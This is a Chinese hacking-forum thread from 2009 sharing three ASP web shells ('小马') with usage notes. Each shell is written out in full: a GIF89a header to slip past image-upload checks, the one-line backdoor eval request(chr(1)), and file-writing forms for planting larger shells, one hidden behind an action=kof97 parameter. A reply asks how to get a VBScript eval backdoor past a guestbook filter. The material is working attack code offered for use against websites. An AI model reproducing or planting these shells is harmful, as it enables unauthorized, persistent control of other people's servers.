Board logo

标题: 小马收藏! [打印本页]
作者: yyw258520    时间: 2009-7-29 18:15     标题: 小马收藏!

由于这久我在学习这方面类容!所以找到的这方面资源比较多喔!呵呵!分享下啦!
第一款 :

GIF89a$       ;<hTml>
<%eval request(chr(1))%>
<%
on error resume next
testfile=Request.form("filepath")
msg=Request.form("message")
if Trim(request("filepath"))<>"" then
set fs=server.CreateObject("scripting.filesystemobject")
set thisfile=fs.CreateTextFile(testfile,True)
thisfile.Write(""&msg& "")
if err =0 Then
response.write "<font color=red>ok</font>"
else
response.write "<font color=red>no</font>"
end if
err.clear
thisfile.close
set fs = nothing
End if
%>
<form method="POST" ACTION="">
<input type="text" size="20" name="filepath"
value="<%=server.mappath("go.asp")%>"> <BR>
<TEXTAREA NAME="Message" ROWS="5" COLS="40"></TEXTAREA>
<input type="submit" name="Send" value="go">
</form></body></html></body></html>

第二款:

GIF89a$       ;<hTml>
<%eval request(chr(1))%>                  
<% if request("action")="kof97" then %>
<%on error resume next%>
<%ofso="scripting.filesystemobject"%>
<%set fso=server.createobject(ofso)%>
<%path=request("path")%>
<%if path<>"" then%>
<%data=request("dama")%>
<%set dama=fso.createtextfile(path,true)%>
<%dama.write data%>
<%if err=0 then%>
<%="success"%>
<%else%>
<%="false"%>
<%end if%>
<%err.clear%>
<%end if%>
<%dama.close%>
<%set dama=nothing%>
<%set fos=nothing%>
<%="<form action='' method=post>"%>
<%="<input type=text name=path>"%>
<%="<br>"%>
<%=server.mappath(request.servervariables("script_name"))%>
<%="<br>"%>
<%=""%>
<%="<textarea name=dama cols=50 rows=10 width=30></textarea>"%>
<%="<br>"%>
<%="<input type=submit value=save>"%>
<%="</form>"%>
<% end if %>
</body></html>

第三款:

<%set s=server.createObject("Adodb.Stream")%>
<%s.Type=2%>
<%s.Open%>
<%s.CharSet="gb2312"%>
<%s.writetext request("d")%>
<%s.SaveToFile server.mappath("go.asp"),2%>
<%s.Close%>
<%set s=nothing%>
<form>
<textarea name=d cols=80 rows=10 width=32></textarea>
<input type=submit>
</form>

使用说明及介绍:

第一款 功能说明: 用一句话连接进行传马 或直接传马

GIF89a$       ;<hTml> --[这里的意思相信大家都了解 意思就是 上传图片时起到欺骗的作用.]

<%eval request(chr(1))%> --[这是就asp一句话木马 这里的 chr(1) 就是asp一句话木马的密码

那么实际chr(1)= 所以密码为 别说你不知知道

重点来了 当你用这个ASP小马时 你可以用这个asp小马来里面的一句话进行传大马 然也可以直接用这个传大马

<input type="text" size="20" name="filepath" value="<%=server.mappath("go.asp")%>">

这里的go.asp就是上传马的地址了 这个自己可以修改   说的够详细吧

第二款:

同上功能就不说了!

<% if request("action")="kof97" then %> 相信懂ASP的一看就明白! 也不多说了

用法是 直接在你小马地址后面加上 ?action=kof97 给个例子吧

http://www.xxx.com/xxx.asp?action=kof97 kof97这个改成自己的!在小马里面改

好处就是 当别人直接访问你的小马时 显示的是空白 无法使用你的小马 与要密码的小马差不多

第三款:

可以说是除了ASP一句话小马之外就非它莫属了! 只有两百多个字节

<%s.SaveToFile server.mappath("go.asp"),2%> 当你打开小马地址就会自动生成go.asp 修改成自己的

此小马要与 一句话小马 或其它小马 配合使用 当你在在输入框写入我们的马 然后点 提交 会自动生成go.asp 小马地址

好处就是 当别人直接访问你的小马时 不管他提交什么马 他不知道你设置的那个文件地址
作者: huar    时间: 2009-7-30 09:06

支持``
作者: 394931603    时间: 2009-8-2 12:15

不错啊。
我有问题要问
可是发不了帖子……
想在留言板用一句话,他的留言板过滤了%和空格,其他都没过滤。怎么办?
怎么转换%和空格
或者别的方法。
看到网上,<script language=vbs runat=server>eval(request(#))</script> 这个貌似可以 但是空格还是被过滤啊。客户端连接怎么连接?
是不是和<%execute request("#")%>连接方式一样啊?
作者: 闲逛    时间: 2009-8-3 11:35

好东西~
作者: 冷酷鲨鱼    时间: 2010-4-27 20:54

这次是灌水!
作者: yanhuohua999    时间: 2010-5-22 19:33

不知道怎么用。。正在学习。
作者: Winmillion    时间: 2010-8-12 00:53

一般在大马地址后面增加action,就连大马的作者也不知道.呵呵.
作者: QQlook    时间: 2011-10-13 03:16

好东西要支持!!!!








www.56tobao.com



欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/) Powered by Discuz! 7.2